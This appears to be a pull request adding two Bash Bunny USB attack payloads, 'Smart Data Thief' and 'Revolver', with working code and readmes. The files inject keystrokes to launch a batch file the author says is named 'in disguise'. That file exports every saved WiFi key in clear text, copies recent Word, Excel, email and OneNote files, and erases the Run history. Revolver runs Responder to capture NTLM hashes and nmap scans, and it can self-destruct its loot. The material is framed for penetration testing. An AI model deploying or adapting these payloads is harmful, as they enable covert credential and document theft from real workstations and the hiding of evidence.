New Exfiltration Payload: Smart Data Thief (#453)

* Exfiltrate using Windows utility SmartFileExtract

Script to find all files that a) have filenames with the word "pass" or "secret" in them or b) are standard .DOC files and copy them to loot. SmartFileExtract is used to kill the copy after 500 MBs and / or 90 seconds and will display the copy status using a fake install window.

Dependencies:
Binary (SmartFileExtract.exe) from https://github.com/saintcrossbow/SmartFileExtract

* New Exfiltration: Smart Data Thief

Timed exfiltration attack targeting high value data and WiFi creds. Highly configurable to start / stop attack using BLE beacons, create distraction when aborting attack, and full shutdown for removal after attack complete.

* Revolver BLE controlled multi-attack

New payload: Revolver - a multi option attack controlled by BLE beacons. Plug in Bash Bunny and choose your attack based on what you need in the field.

payloads/library/exfiltration/SmartDataThief_Exfiltrator/payload.txt

@@ -0,0 +1,109 @@
+# Title:         Smart Data Thief
+# Description:   Exfiltrates high value files from documents / desktop, gets all WiFi keys, shuts down after configurable 
+#                time, may be triggered to start and / or stop by BLE, offers optional distraction on shutdown
+# Author:        saintcrossbow
+# Props:         Hak5Darren
+# Version:       1.0
+# Category:      Exfiltration
+# Target:        Windows 10 with minimum powershell usage
+# Attackmodes:   HID, Storage
+
+# Full Description
+# ----------------
+# The perfect versatile data thief with multiple configurations to tailor attacks towards an engagement. Attack is timed 
+# so you'll know exactly how much time you have with each target. See the configuraton section for modifications. 
+#
+# Payload targets the following from the workstation:
+# - All WiFi creds
+# - The past 30 days in both Desktop and Documents
+# - All Word docs, Excel spreadsheets, loose email files (*.msg), text files, and OneNote notebooks
+# 
+# * Note: All bluetooth monitoring based on Hak5Darren's methods already present on the Bash Bunny
+
+# Files
+# -----
+# - payload.txt: Starts and monitors the attack. All configuration contained in this file.
+# - verify.bat: Run the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't 
+#   verify anything – it is just called that because it is "in disguise"
+
+# Setup
+# -----
+# - Place the payload.txt and verify.bat on either switch directory
+# - If you are using a SD card, copy verify.bat under /payloads/switchn/ (where n is the switch you are running)
+# - Good idea to have the Bash Bunny ready to copy to either the device or SD for maximum versatility
+
+# LEDs
+# ----
+# Magenta: Initial setup – about 1 – 3 seconds
+# Slow 1 second yellow on and off: Waiting for start mission trigger by BLE
+# Single yellow blink: Attack in progress
+# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed
+
+# Options
+# -------
+# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
+BB_NAME="BashBunny"
+# Total time allocated for the attack, after which the Bash Bunny will shutdown
+EJECT_TIME=30
+# BLE ID to stop attack immediately and go to shutdown
+ABORT_MISSION="QSTOP"
+# Flash a bunch of windows and lock PC if ABORT mission received
+DISTRACT_ON_ABORT=false
+# Do we wait for a start trigger? And what is it?
+WAIT_FOR_TRIGGER=false
+START_MISSION="QSTART"
+
+# Setup
+# -----
+LED SETUP
+
+# Start bluetooth for observation
+source bunny_helpers.sh
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+sleep 1
+echo -n -e "AT+ROLE=2" > /dev/ttyS1
+echo -n -e "AT+RESET" > /dev/ttyS1
+
+# Wait for "button job" if desired
+if $WAIT_FOR_TRIGGER; then
+  CUCUMBER ENABLE
+  LED Y SLOW
+  WAIT_FOR_PRESENT $START_MISSION
+fi
+
+# Attack
+# ------
+CUCUMBER DISABLE
+ATTACKMODE HID STORAGE
+Q DELAY 1000
+LED ATTACK
+Q DELAY 100
+Q GUI r
+Q DELAY 100
+
+Q STRING cmd.exe /c start /min powershell ".((gwmi win32_volume -f 'label=''$BB_NAME''').Name+'payloads\\$SWITCH_POSITION\verify.bat')"
+Q ENTER
+
+# Variation on the WAIT_FOR_PRESENT method so we can delay as well as observe BLE
+for (( c=1; c<=$EJECT_TIME; c++ ))
+do  
+  timeout 1s cat /dev/ttyS1 > /tmp/bt_observation
+  if grep -ao $ABORT_MISSION /tmp/bt_observation; then
+    if $DISTRACT_ON_ABORT; then
+      for i in {1..5}
+      do
+        Q GUI d
+        Q DELAY 200
+      done
+      Q GUI l
+    fi
+    break
+  fi  
+done
+
+sync
+LED FINISH
+Q DELAY 1500
+shutdown now
+

payloads/library/exfiltration/SmartDataThief_Exfiltrator/readme.md

@@ -0,0 +1,54 @@
+## Smart Data Thief
+
+Make your Bash Bunny into the perfect data thief. This payload is ideal for demonstrating the need to lock workstations: using it, you can stroll through a facility and steal critical information from PC after PC. The attack is highly configurable with the following options:
+
+ - Copies are timed to be as fast or as long as you want. You’ll know
+   exactly how long you have per workstation, and also know you can
+   remove the Bash Bunny safely once it the time expires
+ - The copy may be configured to stop when a secret BLE beacon is sent –
+   the Bash Bunny will shut down for immediate removal.
+ - Concerned that someone might see the attack? Configure the payload to
+   flash windows and suddenly lock before shutting down the Bash Bunny,
+   which gives the payload time to clean up its tracks while you make
+   appropriate excuses.
+ - Want to trigger the payload from afar? Make the attack a “button job”
+   – the Bash Bunny will take advantage of Cool Cucumber CPU usage while
+   waiting for the secret BLE beacon.
+  
+The payload may be used with or without a SD card and places loot in a folder with the computer’s name. Additionally it targets the most likely high-value targets on a workstation, and only those that have been updated in past 30 days – however feel free to tailor parameters to your unique pentest situation.
+
+**Targets**
+
+ 1. All WiFi creds used by the workstation
+ 2. The past 30 days in both Desktop and Documents for:
+- Word docs
+- Excel spreadsheets
+- Loose email files (*.msg)
+- Text files
+- OneNote notebooks
+
+**Files Used**
+
+- payload.txt: Starts and monitors the attack. All configuration constants are contained in this file.
+- verify.bat: Runs the file exfiltration. You may configure the target files in this batch file. Of course, it really doesn't verify anything – it is just called that because it is "in disguise"
+
+**Setup**
+1. Place the payload.txt and verify.bat on either switch directory
+2. If you are using a SD card, copy verify.bat to /payloads/switch*n*/ (where *n* is the switch you are running)
+3. For maximum versatility, place verify.bat in both locations
+
+**Payload Configuration**
+
+Change any of the constants below to match your mission parameters:
+- BB_NAME: Make sure you have the right Bash Bunny name in this constant
+- EJECT_TIME: Total time allocated for the attack, after which the Bash Bunny will shutdown
+- ABORT_MISSION: Specify what BLE beacon will stop the attack - the payload will check every second for the beacon
+- DISTRACT_ON_ABORT: If the payload is stopped by the BLE beacon, it will also flash a bunch of windows and lock the PC before shutting down to cause a distraction.
+- WAIT_FOR_TRIGGER: Don’t start the attack immediately but wait for the BLE beacon.
+- START_MISSION: The BLE beacon that will remotely start the attack. Make sure WAIT_FOR_TRIGGER is set to true.
+
+**LED meanings**
+- Magenta: Initial setup – about 1 – 3 seconds
+- Slow 1 second yellow on and off: Waiting for start mission trigger to be sent by BLE
+- Single yellow blink: Attack in progress
+- Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed

payloads/library/exfiltration/SmartDataThief_Exfiltrator/verify.bat

@@ -0,0 +1,14 @@
+@echo off
+cd /d %~dp0
+mkdir \loot\WiFiCreds\%COMPUTERNAME%
+cd \loot\WiFiCreds\%COMPUTERNAME%
+netsh wlan export profile key=clear
+timeout 1
+mkdir \loot\DriveLast30\%COMPUTERNAME%
+cd \loot\DriveLast30\%COMPUTERNAME%
+robocopy %userprofile%\Documents\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl
+robocopy %userprofile%\Desktop\ . *.doc* *.xls* *.msg *.txt *.one /S /J /MT /MAXAGE:30 /MAX:4000000 /R:0 /np /nfl
+
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+timeout 1
+exit

payloads/library/general/Revolver_BLE-Controlled-Attacks/payload.txt

@@ -0,0 +1,261 @@
+# Title:         Revolver
+# Description:   Multiple network attacks and modes based on BLE beacons
+# Author:        saintcrossbow
+# Props:         Hak5Darren (BLE, QuickCreds, nmap)
+# Version:       1.0
+# Category:      General
+# Target:        Windows 10 with minimum powershell usage
+# Attackmodes:   All
+ 
+# Full Description
+# ----------------
+# This payload was made in the style of Q Branch: those that use this need to know they have 
+# multiple options for attack as well as getting out of a bad situation. Switching into this
+# payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start
+# attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The
+# payload is easily extendable to include any attack you might need in the field.
+#
+# Note other payloads were co-opted into this multimode attack, and to make it easy I used
+# Hak5Darren's code, partially because I imagine he wants to see these payloads extended, 
+# and also because I know he appreciates Q Branch.
+ 
+# Configuring
+# -----------
+# Change the BLE beacon commands listed in Options below to something unique to you. Definitely
+# do not want someone else activating your Bash Bunny. Also verify the responder and nmap 
+# options are to your liking. 
+
+# Usage
+# -----
+# Plug in to get into command waiting mode (slow white LED). Launch attacks by sending the 
+# right BLE beacon. Make sure to stop the beacon after the attack so you won't go into a loop.
+ 
+# LEDs
+# ----
+# Slow white LED: Awaiting BLE commands
+# Yellow: Attack in progress
+# Red: Self destruct of loot 
+# Blue solid: USB mode
+# Cyan solid: Ethernet mode
+ 
+# Options
+# -------
+REQUIRETOOL responder
+
+# BLE beacon options - change to your preferences. Make sure to use things
+# you'll not encounter since you don't want to start a self-destruct sequence
+# on accident
+ABORT_MISSION="QSTOP"
+START_QUICKCREDS_WIN="QCREDS"
+START_QUICKCREDS_NIX="QCREDNIX"
+START_NMAP="QNMAP"
+START_USB="QLOOT"
+START_ETHER="QETHER"
+START_DEL_LOOT="QSELFD"
+
+# Responder options
+RESPONDER_OPTIONS="-w -r -d P"
+RESPONDER_LOOTDIR=/root/udisk/loot/quickcreds
+# Nmap options
+NMAP_OPTIONS = "-sS -O -sV -F -oA"
+NMAP_LOOTDIR=/root/udisk/loot/nmap
+
+# Setup
+# -----
+LED SETUP
+ 
+ 
+# Responder
+# ---------
+# Note: This is a modified version of quick creds
+# Original by Hak5Darren
+# ---------
+startResponder()
+{
+  CUCUMBER DISABLE
+  # Set convenience variables
+  GET TARGET_HOSTNAME
+  GET TARGET_IP
+ 
+  # Setup named logs in loot directory
+  mkdir -p $RESPONDER_LOOTDIR
+  HOST=${TARGET_HOSTNAME}
+  # If hostname is blank set it to "noname"
+  [[ -z "$HOST" ]] && HOST="noname"
+  COUNT=$(ls -lad $RESPONDER_LOOTDIR/$HOST* | wc -l)
+  COUNT=$((COUNT+1))
+  mkdir -p $RESPONDER_LOOTDIR/$HOST-$COUNT
+ 
+  # As a backup also copy logs to a loot directory in /root/loot/
+  mkdir -p /root/loot/quickcreds/$HOST-$COUNT
+ 
+  # Check target IP address. If unset, blink RED and end.
+  if [ -z "${TARGET_IP}" ]; then
+     LED FAIL2
+     exit 1
+  fi
+ 
+  # Set LED yellow, run attack
+  LED ATTACK
+  cd /tools/responder
+ 
+  # Clean logs directory
+  rm logs/*
+ 
+  # Run Responder with specified options
+  python Responder.py -I usb0 $RESPONDER_OPTIONS &
+ 
+  # Wait until NTLM log is found
+  until [ -f logs/*NTLM* ]
+  do
+     # Ima just loop here until NTLM logs are found
+     sleep 1
+  done
+ 
+  # copy logs to loot directory
+  cp logs/* /root/loot/quickcreds/$HOST-$COUNT
+  cp logs/* $RESPONDER_LOOTDIR/$HOST-$COUNT
+ 
+  # Sync USB disk filesystem
+  sync
+  LED FINISH
+  Q DELAY 1500
+ 
+  # Return to waiting mode
+  CUCUMBER ENABLE
+  LED W SLOW
+}
+
+# Nmap
+# ----
+# Note: This is a modified version of one of the very first payloads, nmap
+# Original by Hak5Darren
+# ----
+startNmap()
+{
+  CUCUMBER DISABLE
+  ATTACKMODE RNDIS_ETHERNET
+
+  GET TARGET_HOSTNAME
+  GET TARGET_IP
+
+  # Setup named logs in loot directory
+  mkdir -p $NMAP_LOOTDIR
+  HOST=${TARGET_HOSTNAME}
+  # If hostname is blank set it to "noname"
+  [[ -z "$HOST" ]] && HOST="noname"
+  COUNT=$(ls -lad $NMAP_LOOTDIR/$HOST*.log | wc -l)
+  COUNT=$((COUNT+1))
+
+  if [ -z ""${TARGET_IP} ]; then
+    LED FAIL
+    Q DELAY 1500
+  else
+    LED ATTACK
+	nmap $NMAP_OPTIONS $TARGET_IP >> $NMAP_LOOTDIR/$HOST-$COUNT.log	
+	sync
+    LED FINISH
+    Q DELAY 1500
+  fi
+  
+  # Return to waiting mode
+  CUCUMBER ENABLE
+  LED W SLOW
+}
+
+startLoot()
+{
+  CUCUMBER DISABLE
+  # We are going for solid LED this time in case the device needs to be played off as normal USB
+  # ... and best of luck to you on that! 
+  LED B SOLID
+  ATTACKMODE STORAGE
+}
+
+# For sharing, getting on via putty, or exiting USB mode
+startEthernet()
+{
+  CUCUMBER DISABLE
+  LED C SOLID
+  ATTACKMODE RNDIS_ETHERNET
+}
+
+
+# Delete everything in loot directory
+# Depending on your engagement, could also delete switch and library - but be careful!
+# Switches to HID to ensure it is not in USB mode or possibly timing out in Ethernet. Going plaid 
+# to delete those files
+startSelfDestruct()
+{
+  ATTACKMODE HID
+  CUCUMBER PLAID
+  LED R SOLID
+  rm -r /root/udisk/loot
+  rm -r /root/loot/
+  sync
+  shutdown now
+}
+ 
+# Main
+# ----
+# Start bluetooth for observation
+source bunny_helpers.sh
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+sleep 1
+echo -n -e "AT+ROLE=2" > /dev/ttyS1
+echo -n -e "AT+RESET" > /dev/ttyS1
+ 
+# Wait for BLE
+CUCUMBER ENABLE
+LED W SLOW
+
+while : 
+do
+  timeout 1s cat /dev/ttyS1 > /tmp/bt_observation
+ 
+  # Shutdown
+  if grep -ao $ABORT_MISSION /tmp/bt_observation; then
+    sync
+    LED FINISH
+    Q DELAY 1500
+    shutdown now
+  fi
+ 
+  # Responder - Windows
+  if grep -ao $START_QUICKCREDS_WIN /tmp/bt_observation; then
+    ATTACKMODE RNDIS_ETHERNET
+    startResponder
+  fi
+ 
+  # Responder - *nix or mac
+  if grep -ao $START_QUICKCREDS_NIX /tmp/bt_observation; then
+    ATTACKMODE ECM_ETHERNET
+    startResponder
+  fi
+ 
+  # Start nmap against host
+  if grep -ao $START_NMAP /tmp/bt_observation; then
+    startNmap
+  fi
+  
+  # Open as USB device
+  if grep -ao $START_USB /tmp/bt_observation; then
+    startLoot
+  fi
+  
+  # Open as Ethernet device
+  if grep -ao $START_ETHER /tmp/bt_observation; then
+    startEthernet
+  fi
+
+  # Limited self-destruct of loot
+  if grep -ao $START_DEL_LOOT /tmp/bt_observation; then
+    startSelfDestruct
+	# Leave the scene after the delete
+	break
+  fi
+ 
+done
+ 
+sync

payloads/library/general/Revolver_BLE-Controlled-Attacks/readme.md

@@ -0,0 +1,25 @@
+## Revolver
+
+
+This payload was made in the style of Q Branch: it provides multiple options for attack and getting out of bad situations. Switching into this payload will place the Bash Bunny in a command waiting mode. BLE beacons are sent to start attacks, including QuickCreds and nmap. A loot self-destruct option is also available. The payload is easily extendable to include any attack you might need in the field.
+
+Note other payloads were co-opted into this multimode attack, and to make it easy
+I used Hak5Darren's code, partially because I imagine he wants to see these payloads
+extended, and also because I know he appreciates Q Branch.
+
+**Features**
+ - Once active, the Bash Bunny blinks a white LED indicating it is waiting for BLE beacons 
+ - Commands may be issued to start classic payloads (nmap, quickcreds), switch modes (USB storage or Ethernet), shutdown for removal, or initiate a loot self-destruct
+ - After attacks are complete, Bash Bunny returns to a waiting state for more commands (except for self destruct and shut down)
+
+**Payload Configuration**
+1. Change the BLE beacons in the *Options* section. Don't leave in defaults - you don't want someone else to control your Bash Bunny!
+2. Verify the responder and nmap options are to your liking
+
+**LED meanings**
+- Slow 1 second white on and off: Awaiting commands
+- Single yellow blink: Attack in progress
+- Green rapid flash, then solid: Attack complete
+- Solid red: Loot self-destruct - complete and ready to remove when off
+- Solid blue: USB mode
+- Solid cyan: Ethernet mode